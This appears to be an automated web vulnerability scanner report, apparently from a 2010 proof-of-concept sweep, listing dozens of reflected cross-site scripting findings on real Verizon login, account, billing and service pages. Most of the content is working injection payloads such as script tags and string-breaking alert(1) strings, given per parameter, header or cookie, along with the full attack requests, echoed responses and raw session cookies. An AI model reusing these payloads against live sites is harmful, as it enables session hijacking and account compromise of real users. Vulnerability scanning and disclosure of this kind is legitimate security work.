HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 MyVzServer: 03A02V Content-Type: text/html; charset=utf-8 Content-Length: 47344 Expires: Sat, 20 Nov 2010 00:16:50 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:50 GMT Connection: close Set-Cookie: RegistrationApp=SessionId=8258b46e-23bd-41ac-b0a6-3b65ca36843c; domain=.verizon.com; path=/ Set-Cookie: VZGEO=west; domain=.verizon.com; path=/ Set-Cookie: NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6bf45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Verizon | Sign In</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta ...[SNIP]... <INPUT type="hidden" value="/sso/redirect/redirect.asp?Target=https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=AMFBAU&3828e"><script>alert(1)</script>450552b46bf=1" name="target"> ...[SNIP]...
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a916'-alert(1)-'a4883ee17a5 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var frm = document.formLogin; uid = frm.UserId.value; pass = frm.Password.value;
if ( uid.length = ...[SNIP]... ipt">
var pageUrl = 'http://www22.verizon.com:80/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F4a916'-alert(1)-'a4883ee17a5'; if (pageUrl.indexOf('err=') != -1) { openPopup('User Message(s)', document.all ? 453 : 453, 'PsswdMismatch'); document.getElementById('PopOK').focus(); } ...[SNIP]...
3.115. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdc9f'-alert(1)-'ea90d6efe28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the bannerid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55d47"%3b6993170f2f3 was submitted in the bannerid parameter. This input was echoed as 55d47";6993170f2f3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm?bannerid=BannerDry1m55d47"%3b6993170f2f3 HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 64661 Expires: Sat, 20 Nov 2010 00:09:51 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:51 GMT Connection: close Set-Cookie: ContextInfo_State=TX; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet | Check Availability </title><meta name="keywords" content="how to get verizon high speed internet, order verizon high ...[SNIP]... <script language ="javascript">
// for check Availabiltity var BannerID = "BannerDry1m55d47";6993170f2f3"; var xmlSource = "<PROMOBANNERS> ...[SNIP]...
The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b710b"><script>alert(1)</script>55aa320ee52 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the FlowRoute request parameter is copied into a JavaScript rest-of-line comment. The payload 89a05%0aalert(1)//cc561db1e96 was submitted in the FlowRoute parameter. This input was echoed as 89a05 alert(1)//cc561db1e96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.119. https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37328"%3b82d1bb06d82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37328";82d1bb06d82 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET ETag: X-Powered-By: ASP.NET Content-Type: text/html Cache-Control: private, max-age=7200 Date: Sat, 20 Nov 2010 02:49:20 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66445525d5f4f58455e445a4a423660;path=/ Content-Length: 129022
<!-- Vignette V6 Fri Nov 19 18:49:19 2010 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Verizon | My Verizon Sign In - Online Account Management</title> ...[SNIP]... d="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom; } if(bLog){ window.location.href='https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx?37328";82d1bb06d82=1'; <!-- Vignette V6 Fri Nov 19 18:49:19 2010 --> ...[SNIP]...
3.120. https://www22.verizon.com/ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71f4e"%3b9ffd29efbfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71f4e";9ffd29efbfb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the UIDPWD request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31ab8"><script>alert(1)</script>0ab8ac65924 was submitted in the UIDPWD parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the WTNOnly request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eb64"><script>alert(1)</script>4317d0b7492 was submitted in the WTNOnly parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN request parameter is copied into the HTML document as plain text between tags. The payload 803f5<script>alert(1)</script>a7a0468d9ed was submitted in the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN request parameter is copied into the HTML document as plain text between tags. The payload 78e35<script>alert(1)</script>a713bc75061 was submitted in the 3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=178e35<script>alert(1)</script>a713bc75061 HTTP/1.1 Host: www22.verizon.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Verizon | Sign In</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta ...[SNIP]... </script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=178e35<script>alert(1)</script>a713bc75061" name="target"> ...[SNIP]...
3.125. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www22.verizon.com
Path:
/ForyourHome/Registration/Reg/OrLogin.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5db6f<script>alert(1)</script>d983fc34cd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the Client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b116d"%3balert(1)//c8e1f41e796 was submitted in the Client parameter. This input was echoed as b116d";alert(1)//c8e1f41e796 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var tempHTML = document.getElementById(Ctrl1).innerHTML;
...[SNIP]...
3.127. https://www22.verizon.com/foryourhome/MyAccount/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://www22.verizon.com
Path:
/foryourhome/MyAccount/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfa60"%3bf05a0d1a8b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cfa60";f05a0d1a8b6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET ETag: X-Powered-By: ASP.NET Content-Type: text/html Cache-Control: private, max-age=7200 Date: Sat, 20 Nov 2010 02:48:53 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66445525d5f4f58455e445a4a423660;path=/ Content-Length: 128914
<!-- Vignette V6 Fri Nov 19 18:48:53 2010 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Verizon | My Verizon Sign In - Online Account Management</title> ...[SNIP]... cument.cookie="MyVzCom=remopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom; } if(bLog){ window.location.href='https://www22.verizon.com/foryourhome/MyAccount/?cfa60";f05a0d1a8b6=1'; <!-- Vignette V6 Fri Nov 19 18:48:53 2010 --> ...[SNIP]...
3.128. https://www22.verizon.com/foryourhome/billview/PfbPage.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://www22.verizon.com
Path:
/foryourhome/billview/PfbPage.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9f30"%3b3e7ac830269 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9f30";3e7ac830269 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET ETag: X-Powered-By: ASP.NET Content-Type: text/html Cache-Control: private, max-age=7200 Date: Sat, 20 Nov 2010 02:47:44 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: ASPSESSIONIDSQCTQBBS=AFAADPNBHJKOMNEGALNHDACA; path=/ Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660;path=/ Content-Length: 128949
<!-- Vignette V6 Fri Nov 19 18:47:43 2010 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Verizon | My Verizon Sign In - Online Account Management</title> ...[SNIP]... ie="MyVzCom=remopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom; } if(bLog){ window.location.href='https://www22.verizon.com/foryourhome/billview/PfbPage.aspx?d9f30";3e7ac830269=1'; <!-- Vignette V6 Fri Nov 19 18:47:43 2010 --> ...[SNIP]...
3.129. https://www22.verizon.com/foryourhome/myaccount/Main/MyAccount.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://www22.verizon.com
Path:
/foryourhome/myaccount/Main/MyAccount.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dbeb"%3b928f0315c8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1dbeb";928f0315c8d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Target request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a525"%3b6c5402aa620 was submitted in the Target parameter. This input was echoed as 6a525";6c5402aa620 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET ETag: X-Powered-By: ASP.NET Content-Type: text/html Cache-Control: private, max-age=7200 Date: Sat, 20 Nov 2010 02:43:12 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: ASPSESSIONIDSCSBQTCB=DGDMJDFBHBIOMKNLOAIKOOMO; path=/ Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66b45525d5f4f58455e445a4a423660;path=/ Content-Length: 128927
<!-- Vignette V6 Fri Nov 19 18:43:11 2010 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Verizon | My Verizon Sign In - Online Account Management</title> ...[SNIP]... uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom; } if(bLog){ window.location.href='https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx?Target=6a525";6c5402aa620'; <!-- Vignette V6 Fri Nov 19 18:43:11 2010 --> ...[SNIP]...
3.131. https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
https://www22.verizon.com
Path:
/foryourhome/registration/regprofile/ergcon.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcc6f"%3b98476cbd401 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fcc6f";98476cbd401 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5019"%3b15d2ffcfe11 was submitted in the goto parameter. This input was echoed as c5019";15d2ffcfe11 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 383dc"%3bf834175335c was submitted in the goto parameter. This input was echoed as 383dc";f834175335c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET ETag: X-Powered-By: ASP.NET Content-Type: text/html Cache-Control: private, max-age=7200 Date: Sat, 20 Nov 2010 02:15:10 GMT Connection: keep-alive Connection: Transfer-Encoding Content-Length: 129009
<!-- Vignette V6 Fri Nov 19 18:15:10 2010 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Verizon | My Verizon Sign In - Online Account Management</title> ...[SNIP]... id="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom; } if(bLog){ window.location.href='https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx383dc";f834175335c'; <!-- Vignette V6 Fri Nov 19 18:15:10 2010 --> ...[SNIP]...
3.134. https://www36.verizon.com/CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98d8b"%3bdc8f525814c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98d8b";dc8f525814c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx?98d8b"%3bdc8f525814c=1 HTTP/1.1 Host: www36.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET ETag: X-Powered-By: ASP.NET Content-Type: text/html Cache-Control: private, max-age=7199 Date: Sat, 20 Nov 2010 03:04:34 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: ASPSESSIONIDCSBCCATB=NFJIEODCIOLCEPMOHFJNOAHN; path=/ Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660;path=/ Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 03:09:34 GMT; path=/myverizon/; domain=verizon.com Content-Length: 129020
<!-- Vignette V6 Fri Nov 19 19:04:33 2010 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Verizon | My Verizon Sign In - Online Account Management</title> ...[SNIP]... d="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom; } if(bLog){ window.location.href='https://www36.verizon.com/CallAssistant/MyAccount/members/CallsAndMessagesNew.aspx?98d8b";dc8f525814c=1'; <!-- Vignette V6 Fri Nov 19 19:04:33 2010 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 575f9'%3b59cfc6b5eb6 was submitted in the REST URL parameter 2. This input was echoed as 575f9';59cfc6b5eb6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /FiOSVoice/members575f9'%3b59cfc6b5eb6/CallsandMessages.aspx HTTP/1.1 Host: www36.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 2947 Expires: Sat, 20 Nov 2010 03:04:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 03:04:23 GMT Connection: close Set-Cookie: ASP.NET_SessionId=yx3n03emjvwwvqfejmdrmu55; path=/; HttpOnly
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head><title>Verizon FiOS® Digital Voice Account Manager</title><meta http-equiv="Content-Type" content="text/html;charset= ...[SNIP]... <script type="text/javascript"> setPage('/fiosvoice/PageNotFound.aspx?aspxerrorpath=/FiOSVoice/members575f9';59cfc6b5eb6/CallsandMessages.aspx&SETTOPARENT=TRUE'); function getE(id){return document.getElementById(id);} function setPage(URL){window.open(URL,'_top','',false);} function PageHeight(){ browser_Ven=navig ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12792</script><script>alert(1)</script>85d85e30042 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Medium/ HTTP/1.1 Host: www.verizonbusiness.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.712792</script><script>alert(1)</script>85d85e30042 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Vary: * Server: Roxen/4.5.146-release3 Accept-Ranges: bytes ETag: "a821b7c7c96c1edc411967617847d9ee" Last-Modified: Sat, 20 Nov 2010 01:51:17 GMT Content-Type: text/html; charset=ISO-8859-1 Vary: Accept-Encoding Date: Sat, 20 Nov 2010 01:51:17 GMT Connection: close Set-Cookie: BERT=VRID%3d035c7296-52e1-4eea-beab-671dfdb451f1|VTID%3d45df8a3c-e08a-467b-9bd9-ee6969a25fcd|SX%3d1290219077|VP%3d1|RMC%3dxg|LP%3den; expires=Fri, 20 Nov 2015 06:55:01 GMT; domain=www.verizonbusiness.com; path=/ Expires: Thu, 19 Nov 2009 19:51:17 GMT Content-Length: 28871
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head> <script language="JavaScript" type="text/javascript"> var regC = /https?:\/\/.*?\/\ ...[SNIP]... en", "flash2", "1000", "375", "6", "",flashvars,flashparams,{},function(e){ var ua="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.712792</script><script>alert(1)</script>85d85e30042"; var q="<q> ...[SNIP]...
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload ab670<script>alert(1)</script>34458ec6bd8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
